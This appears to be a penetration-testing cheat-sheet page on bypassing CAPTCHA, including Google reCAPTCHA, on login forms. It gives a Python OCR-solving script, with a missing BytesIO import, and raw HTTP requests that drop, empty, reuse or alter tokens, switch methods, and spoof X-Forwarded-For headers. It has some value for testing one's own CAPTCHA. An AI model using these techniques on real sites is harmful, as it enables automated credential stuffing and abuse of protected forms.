CAPTCHA

Captcha Bypass via response manipulation

It seems like you're looking for a way to handle CAPTCHA on a website for an automation task. Here’s a structured approach based on your points:

  1. Do not send the parameter related to the CAPTCHA.

  2. Change from POST to GET or other HTTP Verbs.

  3. Change to JSON or from JSON.

  4. Send the CAPTCHA parameter empty.

  5. Check if the value of the CAPTCHA is in the source code of the page.

  6. Check if the value is inside a cookie.

  7. Try to use an old CAPTCHA value.

  8. Check if you can use the same CAPTCHA value several times with the same or different session ID.

  9. If the CAPTCHA consists of a mathematical operation, try to automate the calculation.

  10. If the CAPTCHA consists of reading characters from an image, check manually or with code how many images are being used and if only a few images are being used, detect them by MD5.

  11. Use an OCR Tesseract OCR.

  12. Online services to bypass CAPTCHAs (e.g., Capsolver).

Here's an example of using Python with requests and Tesseract OCR for handling text-based CAPTCHA images:

import requests
from PIL import Image
import pytesseract

# Function to get CAPTCHA image and solve it
def solve_captcha(image_url):
    response = requests.get(image_url)
    img = Image.open(BytesIO(response.content))
    captcha_text = pytesseract.image_to_string(img)
    return captcha_text.strip()

# Example request without CAPTCHA parameter
response = requests.get("https://example.com/api/endpoint")
print(response.text)

# Example request with empty CAPTCHA parameter
response = requests.post("https://example.com/api/endpoint", data={"captcha": ""})
print(response.text)

# Example request with CAPTCHA parameter solved using OCR
captcha_text = solve_captcha("https://example.com/captcha/image")
response = requests.post("https://example.com/api/endpoint", data={"captcha": captcha_text})
print(response.text)

Ensure you have the necessary permissions and are compliant with the website's terms of service when performing these actions.

Bypass Captcha (Google reCAPTCHA)

  1. Try changing the request method, for example POST to GET

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

Change the method to GET

GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
Host: target.com
...

  1. Try remove the value of the captcha parameter

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=&_Username=daffa&_Password=test123

  1. Try reuse old captcha token

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123

  1. Convert JSON data to normal request parameter

POST / HTTP 1.1
Host: target.com
...

{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}

Convert to normal request

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

  1. Try custom header to bypass captcha

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

  1. Change some specific characters of the captcha parameter and see if it is possible to bypass the restriction.

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

Try this to bypass

POST / HTTP 1.1
Host: target.com
...

_RequestVerificationToken=xxxdxxxaxxcxxx&_Username=daffa&_Password=test123
Previous2FANextCommenting

Last updated